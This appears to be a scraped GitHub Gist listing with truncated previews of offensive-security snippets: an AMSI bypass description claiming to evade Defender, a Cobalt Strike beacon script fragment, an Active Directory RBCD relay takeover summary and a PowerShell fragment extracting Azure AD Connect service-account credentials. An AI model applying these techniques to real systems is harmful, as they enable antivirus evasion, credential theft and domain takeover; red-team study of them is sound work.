Skip to content

Instantly share code, notes, and snippets.

bobby-tablez / unicode_amsi_bypass.txt
Last active March 29, 2024 17:25
AMSI Bypass Unicode Combining
# This simply echos a huge amount of overlapped or combined unicode characters before and after an unobfuscated AMSI Bypass.
# This somehow allows the user to run whatever then want inside the overlapping character blobs.
# Currently bypasses Defender Dec. 2023
# Writeup:
# Overlapping Unicode Chars:
# AMSI Bypass:
on heartbeat_15m {
foreach $beacon (beacons()) {
println("[VPN] Running command on id: " . $beacon['id'] . ", hostname:" . binfo($beacon['id'], "computer") . "\n");
$id = $beacon['id'];
print("[VPN] Captured network interfaces from " . binfo($1, "computer") . ", looking for a new IPs to alert on\n");
exec("python3.7 /<fullpath>/ --data " . transform($2, "powershell-base64") . " --user " . binfo($1, "user") . " --computer " . binfo($1, "computer"));
Wra7h / Compress.cs
Created December 2, 2021 08:00
C# Compression using Windows API
//Compresses a file using the Windows API
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\Compress.cs
//Windows Compression API:
//Supported Algorithms:
// Takes a file, compresses it using one of the supported algorithms and creates a file with the compressed data.
using System;
using System.IO;
using System.Linq;
gladiatx0r /
Last active January 2, 2025 00:23
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

xpn / azuread_decrypt_msol_v2.ps1
Last active March 14, 2025 13:35
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
try {
} catch {
Write-Host "[!] Could not connect to localdb..."
aseering /
Last active March 12, 2025 11:27
NTLM auth-string decoder
#!/usr/bin/env python
## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
## <>
## with additional detail subsequently added from the official protocol spec:
## <>